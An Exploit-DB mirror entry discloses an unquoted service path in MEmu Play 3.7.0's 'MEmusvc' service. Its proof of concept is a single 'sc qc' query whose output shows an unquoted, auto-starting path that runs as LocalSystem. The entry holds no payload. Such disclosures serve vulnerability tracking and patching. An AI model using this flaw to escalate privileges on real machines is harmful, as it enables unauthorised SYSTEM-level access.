exploit-db-mirror/exploits/windows/local/49016.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

24 lines
No EOL
764 B
Text

#Exploit Title: MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-07
#Vendor : Microvirt
#Version : Microvirt MEMU 3.7.0
#Vendor Homepage : https://www.memuplay.com/
#Tested on OS: Windows 10 Home
#Analyze PoC :
==============
C:\Users\Sam Sanz>sc qc "MEmusvc"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: MEmusvc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Microvirt\MEmu\MemuService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : MEmusvc
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem